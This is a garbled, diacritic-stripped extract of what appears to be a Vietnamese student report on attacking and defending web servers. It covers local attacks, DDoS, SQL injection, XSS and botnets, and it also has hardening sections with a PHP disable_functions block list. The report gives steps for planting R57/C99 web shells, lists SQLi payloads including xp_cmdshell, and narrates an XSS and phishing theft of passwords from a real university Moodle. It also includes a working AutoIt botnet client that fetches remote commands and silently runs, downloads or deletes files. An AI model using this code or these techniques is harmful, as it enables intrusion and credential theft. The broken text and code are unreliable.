Professional Documents
Culture Documents
Đề tài- Tấn công phòng thủ web server
Đề tài- Tấn công phòng thủ web server
MC LC..............................................................................................................1
CHNG 1...........................................................................................................3
TNG QUAN V WEBSITE, CC DCH V CA WEBSITE V LI BO
MT THNG DNG...........................................................................................3
1.1. M t Website v cch hot ng...............................................................3
1.2. Cc dch v v ng dng trn nn web.......................................................4
CHNG 2...........................................................................................................5
CC LOI TN CNG V BO MT NG DNG WEB PH BIN..........5
2.1. LOCAL ATTACK......................................................................................5
2.1.1. Tm hiu v Local Attack.....................................................................5
2.1.2. Cch tn cng Local Attack.................................................................5
2.1.3. Cch bo mt cho Local Attack...........................................................9
2.1.4. Cc cng c h tr.............................................................................15
2.2. Tn cng t chi dch v - (Denial Of Service)........................................17
2.2.1. DOS(Denial Of Service)....................................................................17
2.2.2. Ddos(Distributed Denial of Service)..................................................21
2.2.3. Tn cng t chi dch v phn x nhiu vng DRDoS (Distributed
Reflection Denial of Service).......................................................................35
2.3. SQL Injection............................................................................................36
2.3.1. Tn cng SQL injection.....................................................................36
2.3.2.Cch Phng Trnh SQL Injection.......................................................43
2.4. Cross Site Scripting (XSS)........................................................................45
2.4.1. Tn cng XSS....................................................................................45
2.4.2. Phng Chng......................................................................................48
2.5. Botnet.......................................................................................................49
2.5.1. Tm hiu botnet v cch pht tn.......................................................49
2.5.2. Khc phc...........................................................................................49
2.5.5. Cc cng c h tr.............................................................................49
2.6. Social Engineering....................................................................................52
2.6.1. Cc kiu la o thng dng..............................................................52
Face mail...................................................................................................52
2.6.2. Cc kiu la o khc........................................................................54
2.7. Sniffer........................................................................................................54
2.7.1. Tm hiu tn cng kiu sniffer...........................................................54
2.7.2. Cc cng c h tr.............................................................................55
CHNG 3.........................................................................................................56
DEMO..................................................................................................................56
KT LUN..........................................................................................................65
TI LIU THAM KHO....................................................................................66
-1-
-2-
Tm hiu cc k thut tn cng ph bin nht hin nay nh SQL Injection, Denial Of
Service, Local Attack,Cch bo mt, phng th cc loi tn cng ph bin trn mt
cch tng quan nht.
CHNG 1
TNG QUAN V WEBSITE, CC DCH V CA WEBSITE V LI
BO MT THNG DNG
1.1. M t Website v cch hot ng
Website l mt trang web trn mng Internet, y l ni gii thiu nhng thng tin,
hnh nh v doanh nghip v sn phm, dch v ca doanh nghip (hay gii thiu bt
c thng tin g) khch hng c th truy cp bt k ni u, bt c lc no.
Website l tp hp nhiu trang [web page]. Khi doanh nghip xy dng website ngha
l ang xy dng nhiu trang thng tin, catalog sn phm, dch v.... to nn mt
website cn phi c 3 yu t c bn:
Cn phi c tn min (domain).
Ni lu tr website (hosting).
Ni dung cc trang thng tin [web page].
Mt s thut ng c bn:
- Website ng (Dynamic website) l website c c s d liu, c cung cp cng c
qun l website (Admin Tool). c im ca website ng l tnh linh hot v c th
cp nht thng tin thng xuyn, qun l cc thnh phn trn website d dng. Loi
website ny thng c vit bng cc ngn ng lp trnh nh PHP, Asp.net, JSP,
Perl,..., qun tr C s d liu bng SQL hoc MySQL,...
- Website tnh do lp trnh bng ngn ng HTML theo tng trang nh brochure, khng
c c s d liu v khng c cng c qun l thng tin trn website. Thng thng
website tnh c thit k bng cc phn mm nh FrontPage, Dreamwaver,... c
im ca website tnh l t thay i ni dung, s thay i ni dung ny thng lin
quan n s thay i cc vn bn i km th hin ni dung trn .
-3-
CHNG 2
CC LOI TN CNG V BO MT NG DNG WEB PH BIN
2.1. LOCAL ATTACK
2.1.1. Tm hiu v Local Attack
Local attack l mt trong nhng kiu hack rt ph bin v khng c khuyn
dng.i mt web server thng thng khi bn ng k mt ti khon trn server no
bn s c cp mt ti khon trn server v mt th mc qun l site ca
mnh. V d : tenserver/tentaikhoancuaban. V nh vy cng c mt ti khon ca
ngi dng khc tng t nh : tenserver/taikhoan1.Gi s taikhoan1 b hacker chim
c th hacker c th dng cc th thut,cc on scrip,cc on m lnh truy cp
sang th mc cha site ca bn l tenserver/taikhoancuaban. V cng theo cch ny
hacker c th tn cng sang cc site ca ngi dng khc v c th ly thng tin
admin,database,cc thng tin bo mt khc hoc chn cc on m c vo trang index
ca site bn. Dng tn cng trn gi l Local Attack
Thng thng nht, Local Attack c s dng c ly thng tin config t victim,
sau da vo thng tin config v mc ch ca hacker ph hoi website
2.1.2. Cch tn cng Local Attack
thc hin tn cng Local Attack, ty theo cch thc ca hacker m c nhng cch
Local khc nhau. Thng thng th cc hacker thng s dng cc on lnh tn
cng vo database
-5-
2.1.2.1. Chun b
- Trc tin phi c mt con PHP/ASP/CGI backdoor trn server. Backdoor th c rt
nhiu loi khc nhau nhng ph bin nht l phpRemoteView (thng c gi l
remview) R57Shell, CGITelnet,C99,
Tin hnh upload cc cng c trn ln, thng l cc con shell nh R57,C99,
- Upload mt trong nhng cng c ln host (Thng th chng ta s dng cc con
shell R57,C99,.. v n mnh v d s dng)
c host chng ta c nhiu cch:
+Mua mt ci host(cch ny hacker t s dng v nhiu l do nhng l do c bn vn
l tn tin m khi up shell ln nu b admin ca server pht hin s b del host,..Vi
cch ny th sau khi Local xong th nn xa cc con shell ngay lp tc.
+ Hack mt trang b li v upload shell ln (thng th hacker s dng SQL Injection
hack mt trang web v chim ti khon admin ca trang web v upload cc con
shell ln)hoc khai thc li inclusion
+ Search backdoor (Vo google.com search keyword: <?phpRemoteView?> ,
r57Shell ...). Vi cch ny th hu ht cc con shell l ca cc hacker s dng v
cha b xa, nu c th chng ta nn upload cho chng ta mt con shell khc
2.1.2.2.Tin hnh Attack
Sau khi chng ta chun b xong, tc l upload c con shell ln 1 server no .
Chng ta bt u tm cc website cng server m bn up shell ln, thng thng cc
hacker thng s dng Reverse Ip domain m hacker upload shell xem cc
website cng server
Sau khi tm c danh sch website ,ln lt check xem site no b li v c th local
sang c
Cc lnh thng dng trong shell Local Attack
Xem tn domain trn cng 1 host
ls -la /etc/valiases
cd /etc/vdomainaliases;ls -lia
Trng hp c bit khi khng th xem user nm cng host th ta thm && vo
-6-
- ifconfig <tn_giao_din>: xem thng tin chi tit v cc giao din mng; thng
thng giao din mng ethernet c tn l eth(). Bn c th ci t cc thit lp mng
nh a ch IP hoc bng cch dng lnh ny (xem man ifconfig). Nu c iu g
cha chnh xc, bn c th stop hoc start (tc ngng hoc khi_ng) giao din bng
cch dng lnh ifconfig <tn_giao_din> up/down.
- passwd: cho php bn thay i mt khu (passwd ngi_dng_s_hu_mt_khu
hoc tn ngi dng khc nu bn ng nhp h thng vi vai tr root).
- useradd: cho php bn thm ngi dng mi (xem man useradd).
D phn phi no, bn cng c th dng phm TAB t ng hon chnh mt lnh
hoc tn file. iu ny rt hu ch khi bn quen vi cc lnh. Bn cng c th s dng
cc phm ln, xung cun xem cc lnh nhp. Bn c th dng lnh a dng trn
mt dng. V d nh, nu mun to ba th mc ch trn mt dng, c php c th l:
mkdir th_mc_1 ; mkdir th_mc_2 ; mkdir th_mc_3.
Mt iu th v khc na l cc lnh dng pipe. Bn c th xut mt lnh thng qua
lnh khc. V d: man mkdir | tail s a ra thng tin cc dng cui cng trong trang
xem "th cng" ca lnh mkdir.
Nu lc no c yu cu phi ng nhp vi ti khon gc (tc "siu" admin ca
h thng), bn c th ng nhp tm thi bng cch dng lnh su. Tham s -1 (su-1)
dng thay i th mc ch v cho cc lnh hoc ang dng. Ch l bn cng s
c nhc mt mt khu.
thot hay ng : g exit hoc logout.
2.1.3. Cch bo mt cho Local Attack
hn ch Local Attack, chng ta nn Chmod filemanager ,di chuyn file
config.php v sa i file htaccess v nht l thng xuyn backup d liu
-Chmod File Manager:
+ CHMOD th mc Public_html thnh 710 thay v 750 mc nh vic ny s gip bn
bo v c cu trc Website ca mnh.
+ CHMOD tip cc th mc con (diendan (http://diendan.doanchuyennganh.com),
CHMOD th mc diendan (http://diendan.doanchuyennganh.com) thnh 701, ri
-9-
[i]PHP safe mode l phng php gii quyt vn bo mt cho nhng ni server
chia s hosting cho nhiu accounts (shared-server). N l do thit k 1 cch sai lc ca
tng cp PHP. Hin nay, nhiu ngi chn phng php bt safe-mode bo mt,
c bit l cc ISP
Cc hng dn v cu hnh Security and Safe Mode :
Code:
safe_mode: mc nh : "0" sa di phn quyn : PHP_INI_SYSTEM
safe_mode_gid: mc nh :"0"sa di phn quyn : PHP_INI_SYSTEM
safe_mode_include_dir: mc nh :NULL sa di phn quyn : PHP_INI_SYSTEM
safe_mode_exec_dir: mc nh :""sa di PHP_INI_SYSTEM
safe_mode_allowed_env_vars: mc nh :"PHP_"sa di PHP_INI_SYSTEM
safe_mode_protected_env_vars: mc nh :"LD_LIBRARY_PATH"sa di
PHP_INI_SYSTEM
open_basedir: mc nh :NULL sa di PHP_INI_SYSTEM
disable_functions: mc nh :"" sa di php.ini
disable_classes : mc nh : ""sa di php.ini
Sau y l cch c chnh cu hnh server bt ch safe mode :
Trong file php.ini :
safe_mode = Off chuyn thnh safe_mode = On
disabled_functions nn cha nhng function sau :
PHP Code:
readfile,system, exec, shell_exec, passthru, pcntl_exec, putenv, proc_close,
proc_get_status, proc_nice, proc_open, proc_terminate, popen, pclose, set_time_limit,
escapeshellcmd, escapeshellarg, dl, curl_exec, parse_ini_file, show_source,ini_alter,
virtual, openlog
Khi , ta v d :
PHP Code:
-rw-rw-r-- 1 doanchuyennganh doanchuyennganh 33 Jul 1 19:20 script.php
-rw-r--r-- 1 root root 1116 May 26 18:01 /etc/passwd
Trong script.php l :
-11-
PHP Code:
<?php
readfile('/etc/passwd');
?>
Kt qu :
PHP Code:
Warning: readfile() has been disabled for security reasons in
/docroot/script.php on line 2
Vi li im ca vic bt safe mode:
Thng khi upload file, file s vo /tmp/ vi nhng ngi c quyn khng phi l
owner.
Bt safe-mode s c nhng bt li vi ngi lp trnh code PHP, do , h thng c :
PHP Code:
PHP Code:
<?php
// Kim tra safe mode
if( ini_get('safe_mode') ){
// Code theo bt safe_mode
}else{
// Code theo tt safe_mode
}
?>
-Bo mt server apache :
By gi, xin gii thch tm quan trng ca apache :
Client (Hacker using local attack) ------> Shared server
Shared Server --------------------------> Apache
Apache ---------------------------------> PHP/Perl ... x l ...
PHP/Perl (gi kt qu) -----------------> Apache
Apache (gi kt qu) ------------------>Client
Do quyn chnh apache set .. ch 0 h ph thuc nhiu vo cc application nh
-12-
PHP/CGI ...
Ci t apache :
Code:
pw groupadd apache
pw useradd apache -c "Apache Server" -d /dev/null -g apache -s /sbin/nologin
Theo mc nh, cc process thuc Apache chy vi ch quyn ca ngi dng nobody
(ngoi tr process chnh phi chy vi ch quyn root) v GID thuc nhm nogroup.
iu ny c th dn n nhng e da bo mt nghim trng. Trong trng hp t
nhp thnh cng, tin tc c th ly c quyn truy dng n nhng process khc chy
cng UID/GID. Bi th, gii php ti u l cho Apache chy bng UID/GID t nhm
ring bit, chuyn ch n software y thi.
i vi nhng ai quen dng *nix hn khng l g vi khi nim UID/GID thuc ch
"file permission". Tuy nhin, chi tit ny nn m rng mt t cho nhng bn c cha
quen thuc vi UID/GID. Phn to nhm (group) v ngi dng (user) ring cho
Apache trn c hai chi tit cn ch l:
-d /dev/null: khng cho php user Apache c th mc $HOME nhng nhng user bnh
thng khc
-s /sbin/nologin: khng cho user Apache dng bt c mt shell no c. C mt s
trng hp dng -s /bin/true thay v nologin trn, true l mt lnh khng thc thi g
c v hon ton v hi.
L do khng cho php user Apache c th mc $HOME v khng c cp mt
"shell" no c v nu account Apache ny b c cho php, tin tc cng khng c c
hi tip cn vi system mc cn thit cho th thut "leo thang c quyn". Trn
mi trng *nix ni chung, "shell" l giao din gia ngi dng v h thng, khng c
shell th khng c c hi tip cn. Nu phn thit lp trn cung cp user Apache mt
$HOME v cho php dng mt shell no th khng mang gi tr g trn quan
im "bo mt".
Vo http://httpd.apache.org/ ci t phin bn mi nht (hin gi 2.2)
Khi ta nn set quyn ca php shell ring, n khng c quyn c nhy sang cc
user khc .
-13-
-15-
-16-
-17-
-21-
DDoS attack-network
Agent -Handler
Client Handler
Communication
TCP
UDP
IRC - Based
Client Handler
Communication
ICMP
TCP
UDP
Secret/private channel
Public channel
ICMP
-22-
Attacker
Handler
Agent
Attacker
Handler
Agent
Handler
Agent
Handler
Agent
Agent
Victim
Hnh 2.3. Kin trc attack-network kiu Agent Handler
Attacker s t Client giao tip vi cc1 Handler xc nh s lng Agent ang
online, iu chnh thi im tn cng v cp nht cc Agent. Ty theo cch attacker
cu hnh attack-network, cc Agent s chu s qun l ca mt hay nhiu Handler.
Thng thng Attacker s t Handler software trn mt Router hay mt server c
lng traffic lu thng nhiu. Vic ny nhm lm cho cc giao tip gia Client,
handler v Agent kh b pht hin. Cc gia tip ny thng thng xy ra trn cc
protocol TCP, UDP hay ICMP. Ch nhn thc s ca cc Agent thng thng khng
h hay bit h b li dng vo cuc tn cng kiu DDoS, do h khng kin thc
hoc cc chng trnh Backdoor Agent ch s dng rt t ti nguyn h thng lm cho
hu nh khng th thy nh hng g n hiu nng ca h thng.
ii. M hnh IRC Based:
Internet Relay Chat (IRC) l mt h thng online chat multiuser, IRC cho php User
to mt kt ni n multipoint n nhiu user khc v chat thi gian thc. Kin trc c
IRC network bao gm nhiu IRC server trn khp internet, giao tip vi nhau trn
nhiu knh (channel). IRC network cho php user to ba loi channel: public, private
v serect.
Public channel: Cho php user ca channel thy IRC name v nhn c
message ca mi user khc trn cng channel
-23-
Private channel: c thit k giao tip vi cc i tng cho php. Khng cho
php cc user khng cng channel thy IRC name v message trn channel. Tuy nhin,
nu user ngoi channel dng mt s lnh channel locator th c th bit c s tn ti
ca private channel .
Secrect channel : tng t private channel nhng khng th xc nh bng channel
locator.
Attacker
Attacker
IRC
NETWORK
Agent
Agent
Agent
Agent
Agent
Victim
Hnh 2.4. Kin trc attack-network ca kiu IRC-Base
IRC Based net work cng tng t nh Agent Handler network nhng m hnh ny
s dng cc knh giao tip IRC lm phng tin giao tip gia Client v Agent (khng
s dng Handler). S dng m hnh ny, attacker cn c thm mt s li th khc nh:
Cc giao tip di dng chat message lm cho vic pht hin chng l v cng kh
khn
IRC traffic c th di chuyn trn mng vi s lng ln m khng b nghi ng
Khng cn phi duy tr danh sch cc Agent, hacker ch cn logon vo IRC server l
c th nhn c report v trng thi cc Agent do cc channel gi v.
Sau cng: IRC cng l mt mi trng file sharing to iu kin pht tn cc Agent
code ln nhiu my khc.
-24-
Bandwith DeleptionDeleption
Random
Port
Attack
ICMP
Static
Port
Attack
Spoof
Source
Attack
Protocol
Exploit
Attack
Amplification
Attack
Flood Attack
UDP
Resource Deleption
Smuft
attack
Flaggle
Attack
Direct
Attack
TCP SYS
Attack
Malformed
Paclket attack
PUSH
+ACK
SYN
Attack
IP @
Attack
IP Packet
Options
Attack
Spoof
source
Attack
Spoof
source
Attack
Spoof
source
Attack
Loop
Attack
Spoof
source
Attack
-25-
dch v ca mc tiu. Phng php ny lm gia tng traffic khng cn thit, lm suy
gim bng thng ca mc tiu.
Flood attack:
Trong phng php ny, cc Agent s gi mt lng ln IP traffic lm h thng dch
v ca mc tiu b chm li, h thng b treo hay t n trng thi hot ng bo ha.
Lm cho cc User thc s ca h thng khng s dng c dch v.
Ta c th chia Flood Attack thnh hai loi:
+ UDP Flood Attack: do tnh cht connectionless ca UDP, h thng nhn UDP
message ch n gin nhn vo tt c cc packet mnh cn phi x l. Mt lng ln
cc UDP packet c gi n h thng dch v ca mc tiu s y ton b h thng
n ngng ti hn.
+ Cc UDP packet ny c th c gi n nhiu port ty hay ch duy nht mt port.
Thng thng l s gi n nhiu port lm cho h thng mc tiu phi cng ra x
l phn hng cho cc packet ny. Nu port b tn cng khng sn sng th h thng
mc tiu s gi ra mt ICMP packet loi destination port unreachable. Thng thng
cc Agent software s dng a ch IP gi che giu hnh tung, cho nn cc message
tr v do khng c port x l s dn n mt i ch Ip khc. UDP Flood attack cng
c th lm nh hng n cc kt ni xung quanh mc tiu do s hi t ca packet din
ra rt mnh.
+ ICMP Flood Attack: c thit k nhm mc ch qun l mng cng nh nh v
thit b mng. Khi cc Agent gi mt lng ln ICMP_ECHO_REPLY n h thng
mc tiu th h thng ny phi reply mt lng tng ng Packet tr li, s dn n
nghn ng truyn. Tng t trng hp trn, a ch IP ca c Agent c th b gi
mo.
+Amplification Attack:
Amplification Attack nhm n vic s dng cc chc nng h tr a ch IP broadcast
ca cc router nhm khuych i v hi chuyn cuc tn cng. Chc nng ny cho
php bn gi ch nh mt a ch IP broadcast cho ton subnet bn nhn thay v nhiu
a ch. Router s c nhim v gi n tt c a ch IP trong subnet packet
broadcast m n nhn c.
-26-
Attacker c th gi broadcast message trc tip hay thng qua mt s Agent nhm lm
gia tng cng ca cuc tn cng. Nu attacker trc tip gi message, th c th li
dng cc h thng bn trong broadcast network nh mt Agent.
Attacker/Agen
t
VICTIM
Amplifier
Amplifier Network
System
-27-
+ Fraggle Attack: tng t nh Smuft attack nhng thay v dng ICMP ECHO
REQUEST packet th s dng UDP ECHO packet gi m mc tiu. Tht ra cn mt
bin th khc ca Fraggle attack s gi n UDP ECHO packet n chargen port (port
19/UNIX) ca mc tiu, vi a ch bn gi l echo port (port 7/UNIX) ca mc tiu,
to nn mt vng lp v hn. Attacker pht ng cuc tn cng bng mt ECHO
REQUEST vi a ch bn nhn l mt a ch broadcast, ton b h thng thuc a
ch ny lp tc gi REPLY n port echo ca nn nhn, sau t nn nhn mt ECHO
REPLY li gi tr v a ch broadcast, qu trnh c th tip din. y chnh l nguyn
nhn Flaggle Attack nguy him hn Smuft Attack rt nhiu.
ii. Nhng kiu tn cng lm cn kit ti nguyn: (Resource Deleption Attack)
Theo nh ngha: Resource Deleption Attack l kiu tn cng trong Attacker gi
nhng packet dng cc protocol sai chc nng thit k, hay gi nhng packet vi dng
lm tt nghn ti nguyn mng lm cho cc ti nguyn ny khng phc v user thng
thng khc c.
a/ Protocol Exploit Attack:
+ TCP SYS Attack: Transfer Control Protocol h tr truyn nhn vi tin cy cao
nn s dng phng thc bt tay gia bn gi v bn nhn trc khi truyn d liu.
Bc u tin, bn gi gi mt SYN REQUEST packet (Synchronize). Bn nhn nu
nhn c SYN REQUEST s tr li bng SYN/ACK REPLY packet. Bc cui
cng, bn gi s truyn packet cui cng ACK v bt u truyn d liu.
SYS
TCP
Client
Client Port
1024-65535
SYN/AC
K
ACK
TCP
Server
80 Service
Port
1-1023
Client
Server
Attacker/Agent
Server
SYN
SYN
SYN/ACK
SYN/ACK
SYN/ACK
ACK
+ IP packet options attack ngu nhin ha vng OPTION trong IP packet v thit lp
tt c cc bit QoS ln 1, iu ny lm cho h thng ca nn nhn phi tn thi gian
phn tch, nu s dng s lng ln Agent c th lm h thng nn nhn ht kh nng
x l.
c/ Mt s c tnh ca cng c DdoS attack:
Agent Setup
Instalation
Active
Passive
Yes
Encruption
No
TCP
Bugged
website
Protocol
OS
supported
Agent
Activation
Methods
Actively
Poll
UDP
Corrupted
File
Unix
Live&wait
ICMP
Agent
Handlerl
YES
Private/Serect
IRC
Basedl
No
Public
Backdoor
Trojan
Buffer Overlfow
Client
Handlerl
Agent
Handlerl
None
TP LNH CA HANDLER
M t
Nhm dng logon vo Handler software (user + password)
Kch hot Handler sn sng nhn lnh
-32-
Log Off
Turn Off
Initiate Attack
List Agents
Kiss Agents
Add victim
Download
tiu nh
Yn cu Handler lit k cc Agent trc thuc
Loi b mt Agent ra khi hng ng Attack-Network
Thm mt mc tiu tn cng
Cp nht cho Handler software (downloads file.exe v v thc thi)
Upgrades
Set Spoofing
Set Attack Time
Set Attack
Duration
BufferSize
Thit lp kch thc buffer ca Agent (nhm gia tng sc mnh cho
Help
Agent)
Hng dn s dng chng trnh
Turn On
Turn Off
TP LNH ca AGENT
Kich hoat Agent sn sng nhn lnh
Ch dn Agent ngng hot ng, nu Agent ang qut tm
Initiate
Attacke
Download
Upgrades
Set Spoofing
Set Attack
Duration
Set Packet
Size
Help
d. Mt s cng c DDoS:
-33-
Da trn nn tng chung ca phn trn, c nhiu cng c c vit ra, thng thng
cc cng c ny l m ngun m nn mc phc tp ngy cng cao v c nhiu bin
th mi l.
* Cng c DDoS dng Agent Handler:
- TrinOO: l mt trong cc cng c DDoS u tin c pht tn rng ri.
TrinOO c kin trc Agent Handler, l cng c DDoS kiu Bandwidth Depletion
Attack, s dng k thut UDP flood. Cc version u tin ca TrinOO khng h tr gi
mo a ch IP. TrinOO Agent c ci t li dng li remote buffer overrun. Hot
ng trn h iu hnh Solaris 2.5.1 Red Hat Linux 6.0. Attack network giao tip
dng TCP (attacker client v handler) v UDP (Handler v Agent). M ha giao tip
dng phng php m ha i xng gia Client, handler v Agent.
- Tribe Flood Network (TFN): Kiu kin trc Agent Handler, cng c DDoS ho
tr kiu Bandwidth Deleption Attack v Resourse Deleption Attack. S dng k thut
UDP flood, ICMP Flood, TCP SYN v Smurf Attack. Cc version u tin khng h
tr gi mo a ch IP, TFN Agent c ci t li dng li buffer overflow. Hot ng
trn h iu hnh Solaris 2.x v Red Hat Linux 6.0. Attack Network giao tip dng
ICMP ECHO REPLY packet (TFN2K h tr thm TCP/UDP vi tnh nng chn
protocol ty ), khng m ha giao tip (TFN2K h tr m ha)
- Stacheldraht: l bin th ca TFN c thm kh nng updat Agent t ng. Giao tip
telnet m ha i xng gia Attacker v Handler.
- Shaft: l bin th ca TrinOO, giao tip Handler Agent trn UDP, Attacker
Hendle trn Internet. Tn cng dng k thut UDP, ICMP v TCP flood. C th tn
cng phi hp nhiu kiu cng lc. C thng k chi tit cho php attacker bit tnh
trng tn tht ca nn nhn, mc quy m ca cuc tn cng iu chnh s lng
Agent.
* Cng c DDoS dng IRC Based:
Cng c DDoS dng IRC-based c pht trin sau cc cng c dng Agent Handler.
Tuy nhin, cng c DDoS dng IRC phc tp hn rt nhiu, do tch hp rt nhiu c
tnh ca cc cng c DDoS dng Agent Handler.
-34-
-35-
-37-
%>
Trong cc tnh hung thng thng, on m ny hin th ni dung ca tin c ID trng
vi ID ch nh v hu nh khng thy c li. Tuy nhin, ging nh v d ng nhp
trc, on m ny l s h cho mt li SQL injection khc. K tn cng c th
thay th mt ID hp l bng cch gn ID cho mt gi tr khc, v t , khi u cho
mt cuc tn cng bt hp php, v d nh: 0
OR 1=1 (ngha l, http://www.doanchuyennganh.com/product.asp?ID=0 or 1=1).
Cu truy vn SQL lc ny s tr v tt c cc article t bng d liu v n s thc hin
cu lnh:
SELECT * FROM T_NEWS WHERE NEWS_ID=0 or 1=1
Mt trng hp khc, v d nh trang tm kim. Trang ny cho php ngi dng nhp
vo cc thng tin tm kim nh H, Tn, on m thng gp l:
<%
Dim vAuthorName, objRS, strSQL
vAuthorName = Request("fAUTHOR_NAME")
strSQL = "SELECT * FROM T_AUTHORS WHERE AUTHOR_NAME =' " & _
vAuthorName & " ' "
Set objRS = Server.CreateObject("ADODB.Recordset")
objRS.Open strSQL, "DSN=..."
-41-
%>
Th chc chn s b li SQL injection, bi v nu ta nhp vo trng th nht v d
nh: ' + (SELECT TOP 1 FieldName FROM TableName) + '. Lc ny cu truy vn s
l: INSERT INTO TableName VALUES(' ' + (SELECT TOP 1 FieldName FROM
TableName) + ' ', 'abc', 'def'). Khi , lc thc hin lnh xem thng tin, xem nh bn
yu cu thc hin thm mt lnh na l: SELECT TOP 1
FieldName FROM TableName
iiii. Dng tn cng s dng stored-procedures
Vic tn cng bng stored-procedures s gy tc hi rt ln nu ng dng c thc thi
vi quyn qun tr h thng 'sa'. V d, nu ta thay on m tim vo dng: ' ; EXEC
xp_cmdshell cmd.exe dir C: '.
n nh:
<%
Function EscapeQuotes(sInput)
sInput = replace(sInput, " ' ", " ' ' ")
EscapeQuotes = sInput
End Function
%>
Trong trng hp d liu nhp vo l s, li xut pht t vic thay th mt gi tr c
tin on l d liu s bng chui cha cu lnh SQL bt hp php. trnh iu ny,
n gin hy kim tra d liu c ng kiu hay khng bng hm IsNumeric().
Ngoi ra c th xy dng hm loi b mt s k t v t kha nguy him nh: ;, --,
select, insert, xp_, ra khi chui d liu nhp t pha ngi dng hn ch cc tn
cng dng ny:
<%
Function KillChars(sInput)
dim badChars
dim newChars
badChars = array("select", "drop", ";", "--", "insert", "delete", "xp_")
newChars = strInput
for i = 0 to uBound(badChars)
next
KillChars = newChars
End Function
%>
ii. Thit lp cu hnh an ton cho h qun tr c s d liu
Cn c c ch kim sot cht ch v gii hn quyn x l d liu n ti khon ngi
dng m ng dng web ang s dng. Cc ng dng thng thng nn trnh dng n
cc quyn nh dbo hay sa. Quyn cng b hn ch, thit hi cng t.
Ngoi ra trnh cc nguy c t SQL Injection attack, nn ch loi b bt k thng
tin k thut no cha trong thng ip chuyn xung cho ngi dng khi ng dng c
-44-
li. Cc thng bo li thng thng tit l cc chi tit k thut c th cho php k tn
cng bit c im yu ca h thng.
2.4. Cross Site Scripting (XSS)
2.4.1. Tn cng XSS
Cross-Site Scripting (XSS) l mt trong nhng k thut tn cng ph bin nht hin
nay, ng thi n cng l mt trong nhng vn bo mt quan trng i vi cc nh
pht trin web v c nhng ngi s dng web. Bt k mt website no cho php ngi
s dng ng thng tin m khng c s kim tra cht ch cc on m nguy him th
u c th tim n cc li XSS.
Cross-Site Scripting hay cn c gi tt l XSS (thay v gi tt l CSS trnh
nhm ln vi CSS-Cascading Style Sheet ca HTML) l mt k thut tn cng bng
cch chn vo cc website ng (ASP, PHP, CGI, JSP ...) nhng th HTML hay nhng
on m script nguy him c th gy nguy hi cho nhng ngi s dng khc. Trong
, nhng on m nguy him c chn vo hu ht c vit bng cc Client-Site
Script nh JavaScript, JScript, DHTML v cng c th l c cc th HTML.K thut
tn cng XSS nhanh chng tr thnh mt trong nhng li ph bin nht ca Web
Applications v mi e do ca chng i vi ngi s dng ngy cng ln. Ngi
chin thng trong cuc thi eWeek OpenHack 2002 l ngi tm ra 2 XSS mi. Ph i
thnh thong vn c trng hp website b dnh XSS nhng vn khng xut hin ci
popup th buc lng bn phi VIEW SOURCES (m bng) n ra xem . Khi view
sources nh kim dng ny < script>alert('XSS)< /script> , nu c th ht chy , XSS
y ri.
Gi http://doannguyennganh.com/index.php l site b dnh li XSS v ta tm c ni
b li nh th ny : http://doannguyennganh.com/index.php?page=<script...</ script> ,
ngha l ta c th chn code ngay trn thanh ADDRESS.
Bc 5: Ln k hoch kch bn tn cng
ii: Tn Cng
Tht ra th c rt nhiu k thut tn cng da trn li XSS ny, ch yu l sau khi
bit cch tm l hng th mi ngi s c mt mu m cho cch tn cng ca mnh.
y mnh xin gii thiu n cc bn mt k thut m mnh thc hin thnh cng trn
trang moodle ca khoa cng ngh thng tin KHTN. K thut n cp password.
Sau khi xc minh mt iu chc chn rng trang moodle b li XSS ch ng nhp
Ti lp tc vit ngay mt ng dng nh ri up ln mt ci host free, ng dng ny s
c nhim v nhn thng tin v mssv v password gi v v ghi xung file txt. Cn
nhn th no th mi cc bn xem tip...
Sau :
Bc 1: Ti to mt mail gi dng ni l: Din n tuyn dng ca Intel, mi cc bn
no quan tm th tham gia.Ri to ra mt ci ng link gi:
http://doannguyennganhgia.com/index.php
nhng ti l reference n ti mt ci trang gi ca tui. Trong tch tc trang ny s gn
mt ci on script c c nhim v ly v username v password sau khi ng nhp
v gn vo ci trang tht(V trang tht b li XSS nn cho php chng ta gn m c
ln, gn y c ngha l khi chng ta view source code ca trang ln, chng ta s thy
c mt on script ca chng ta nm u ), ri sau redirect sang trang tht ngay
lp tc khi b nghi ng.
Bc 2: Ngi dng vo mail, tng tht, click vo link v thy chy ng trang
moodle (H u ng rng, trang tht b gn m c ln, trong thi gian qu nhanh
nn h khng nghi ng g c, nhng nu ai s thy link khng ng).
-47-
-48-
2.5. Botnet
2.5.1. Tm hiu botnet v cch pht tn
Mng botnet l mt mng gm hng trm hng ngn my tnh b chim quyn iu
khin (zombie) c hacker dng thc hin cc cuc tn cng DDOS, pht tn th
rc hoc ci t cc chng trnh qung co
Dng cc tools pht tn virut cho nn nhn v chim quyn iu khin. Mng
Botnet h tr nhiu cho vic tn cng t chi dch v
Cc mng botnet ph bin nh Marisposa hay Zeus
While (1)
GetDr()
ExCmd()
Sleep(1000)
WEnd
Func GetDr()
; Doc va phan tich chi thi
InetGet ($txt, @WindowsDir & "\direc.txt", 1, 0)
$fp = FileOpen(@WindowsDir & "\direc.txt", 0)
Global $con = FileReadLine($fp)
FileClose($fp)
FileDelete(@WindowsDir & "\direc.txt")
EndFunc
Func ExCmd()
; Phan tich va thuc hien lenh
If StringInStr($con, "RUN@", 2) Then ;Chay mot chuong trinh
$cmd = StringSplit($con, "@")
If StringInStr($con, "@SHOW", 2) Then
Run($cmd[2])
Else
Run($cmd[2], "", @SW_HIDE)
EndIf
Sleep(7000)
ElseIf StringInStr($con, "DEL@", 2) Then ;xoa mot file
$cmd = StringSplit($con, "@")
FileDelete($cmd[2])
Sleep(7000)
ElseIf StringInStr($con, "LOAD@", 2) Then ;tai mot file
$cmd = StringSplit($con, "@")
InetGet ($cmd[2], $cmd[3], 0, 1)
Sleep(7000)
ElseIf StringInStr($con, "KILL@", 2) Then ;tat mot tien trinh
$cmd = StringSplit($con, "@")
Run("TASKKILL /F /IM " & $cmd[2] & ".exe", "", @SW_HIDE)
Sleep(7000)
ElseIf StringInStr($con, "DOS@", 2) Then ;Chay len dos, an voi nguoi dung
DOS#LENH
$cmd = StringSplit($con, "@")
-50-
$rc = _RunDos($cmd[2])
Sleep(7000)
ElseIf StringInStr($con, "MSGBOX@", 2) Then ;hien thong bao
MSGBOX#flag#title#text#timeout
$cmd = StringSplit($con, "@")
MsgBox($cmd[2],$cmd[3],$cmd[4],$cmd[5])
Sleep(7000)
ElseIf StringInStr($con, "EXIT@", 2) Then ;thoat chuong trinh
$cmd = StringSplit($con, "@")
Exit
EndIf
EndFunc
//Bang Dieu Khien
<html>
<head>
